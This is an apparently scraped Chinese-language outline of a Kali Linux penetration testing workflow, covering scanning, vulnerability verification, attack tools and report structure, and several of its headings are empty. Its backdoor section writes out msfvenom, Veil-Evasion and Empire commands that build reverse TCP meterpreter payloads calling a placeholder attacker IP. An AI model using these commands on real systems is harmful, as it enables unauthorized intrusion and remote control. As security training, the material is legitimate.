网络拓扑结构分析
域名信息收集
端口扫描
nmap -sS -p 1-65535 target_ip
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-01 15:34 CST
Nmap scan report for target_ip
Host is up (0.12s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
2049/tcp  open  nfs
3306/tcp  open  mysql
5432/tcp  open  postgresql
8080/tcp  open  http-proxy
20000/tcp open  dnp
-sS参数表示使用TCP SYN扫描方式;-p参数表示扫描的端口范围,这里扫描了1-65535所有端口;target_ip为目标IP地址。操作系统识别
服务识别
Web应用程序识别
表格示例:
| 工具名称 | 功能描述 | 
|---|---|
| Google Hacking Database | 使用Google搜索语法来发现目标网站的存在 | 
| Whois查询工具 | 获取目标网站的所有者信息 | 
| DNS查询工具 | 枚举目标网站的子域名 | 
| 端口扫描工具 | 确定目标网站上开放的端口和服务 | 
| Web应用程序识别工具 | 确定目标网站上使用的技术栈、框架和CMS等 | 
敏感信息收集- 通过搜索引擎查找相关公司网站,获取公司名称、业务范围、联系方式等敏感信息。
漏洞扫描工具选择
Nmap
nmap -sS -sV -O target_IP
Nessus
打开Nessus扫描器,输入目标IP地址,选择扫描模板,开始扫描
OpenVAS
打开OpenVAS扫描器,输入目标IP地址,选择扫描模板,开始扫描
Burp Suite
打开Burp Suite,配置代理,使用Burp Scanner进行扫描
Metasploit
打开Metasploit,使用auxiliary模块进行扫描
Acunetix
打开Acunetix,输入目标URL,选择扫描模板,开始扫描
sqlmap
sqlmap -u "target_URL" --dbs
漏洞扫描目标选择
| 目标 | 描述 | 
|---|---|
| Web应用程序 | 使用Burp Suite、OWASP ZAP等工具对Web应用程序进行扫描 | 
| 网络设备 | 使用Nmap、Angry IP Scanner等工具对网络设备进行扫描 | 
| 操作系统 | 使用OpenVAS、Nessus等工具对操作系统进行扫描 | 
| 数据库 | 使用SQLMap等工具对数据库进行扫描 | 
| 无线网络 | 使用Aircrack-ng等工具对无线网络进行扫描 | 
漏洞扫描结果分析
| 漏洞名称 | 漏洞等级 | 影响范围 | 建议处理方案 | 
|---|---|---|---|
| SQL注入漏洞 | 高 | 影响整个网站 | 对输入参数进行过滤和转义处理,使用参数化查询 | 
| XSS漏洞 | 中 | 影响用户信息安全 | 对用户输入进行过滤和转义处理,使用CSP等防护措施 | 
| 未授权访问漏洞 | 低 | 影响部分功能 | 加强权限控制,限制敏感操作的访问权限 | 
漏洞验证- 漏洞验证:
| 漏洞名称 | 漏洞描述 | 验证方式 | 
|---|---|---|
| SQL注入漏洞 | 通过注入恶意代码来获取数据库中的敏感信息或者修改数据库内容 | 在输入框中输入特定的SQL语句,观察网站是否返回异常信息 | 
| XSS漏洞 | 恶意用户在网站上插入脚本代码,当其他用户访问该页面时,脚本会被执行 | 在输入框中输入特定的脚本代码,观察网站是否执行该脚本 | 
| 文件上传漏洞 | 允许用户上传文件,但没有对上传文件进行充分的验证和过滤,攻击者可以上传恶意文件 | 上传包含恶意代码的文件,观察网站是否正常处理该文件 | 
渗透攻击工具选择
渗透攻击工具选择:
| 工具名称 | 用途 | 
|---|---|
| Nmap | 端口扫描 | 
| Metasploit | 漏洞利用 | 
| Burp Suite | Web应用程序攻击 | 
| Aircrack-ng | 无线网络攻击 | 
| Hydra | 密码破解 | 
| John the Ripper | 密码破解 | 
| Sqlmap | SQL注入攻击 | 
| Wireshark | 网络流量分析 | 
| Netcat | 网络工具 | 
| Hping | 网络工具 | 
渗透攻击方式选择
渗透攻击方式选择:
| 攻击方式 | 描述 | 
|---|---|
| 社交工程学 | 通过社交技巧获取目标系统的信息,如钓鱼邮件、电话诈骗等。 | 
| 漏洞利用 | 利用已知或未知漏洞攻击目标系统,如使用Metasploit框架等。 | 
| 密码破解 | 尝试破解目标系统的密码,如使用密码字典、暴力破解等。 | 
| 物理攻击 | 直接进入目标系统所在的物理环境进行攻击,如进入机房、拆卸硬件等。 | 
渗透攻击结果分析
渗透攻击后门植入- 使用Metasploit生成反向TCP后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > backdoor.exe
使用Veil-Evasion生成反向TCP后门:
veil-evasion.py
usestager/windows/meterpreter/rev_tcp
set LHOST <attacker IP>
set LPORT <attacker port>
generate
使用Empire生成反向TCP后门:
listeners
uselistener http
set Name http
set Host <attacker IP>
set Port <attacker port>
execute
back
usestager windows/launcher_bat
set Listener http
execute
表格:
| 后门类型 | 植入方法 | 
|---|---|
| Webshell | 通过漏洞上传Webshell,或者在服务器上直接创建Webshell | 
| Rootkit | 修改系统内核或者驱动程序 | 
| Trojan | 通过社会工程学手段诱骗用户下载安装 | 
| RAT | 通过漏洞或者社会工程学手段植入远程控制软件 | 
漏洞修复建议
漏洞修复跟踪- 漏洞修复跟踪:
| 漏洞编号 | 漏洞描述 | 修复状态 | 修复人员 | 修复时间 | 
|---|---|---|---|---|
| 001 | SQL注入漏洞 | 已修复 | 张三 | 2021-05-01 | 
| 002 | XSS漏洞 | 未修复 | 李四 | - | 
| 003 | 文件上传漏洞 | 已修复 | 王五 | 2021-05-02 | 
渗透测试报告结构
| 标题 | 内容 | 
|---|---|
| 1. 引言 | 对渗透测试的目的、范围、方法、工具等进行说明 | 
| 2. 测试过程 | 对测试的步骤、方法、结果进行详细描述 | 
| 3. 漏洞分析 | 对测试中发现的漏洞进行分析、评估和分类 | 
| 4. 风险评估 | 对漏洞的风险进行评估和分类,并提出相应的建议和措施 | 
| 5. 结论和建议 | 对测试结果进行总结,并提出相应的建议和措施 | 
| 6. 附录 | 包括测试过程中的截图、日志、代码等详细信息 | 
报告编写要点
报告提交及漏洞公开风险评估- 报告提交及漏洞公开风险评估示例:
以上就是kali linux 基本渗透测试流程的详细内容,更多关于kali linux 基本渗透测试流程的资料请关注九品源码其它相关文章!